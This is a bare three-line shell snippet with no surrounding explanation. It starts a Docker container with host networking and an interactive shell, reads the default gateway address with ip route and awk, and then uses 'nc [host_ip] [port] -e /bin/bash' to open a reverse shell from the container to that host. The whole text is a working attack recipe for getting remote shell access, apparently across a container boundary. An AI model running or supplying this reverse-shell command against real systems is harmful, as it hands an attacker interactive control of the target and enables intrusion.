docker run --net=host -it [image_name] /bin/bash ip route | awk '/default/ { print $3 }' nc [host_ip] [port] -e /bin/bash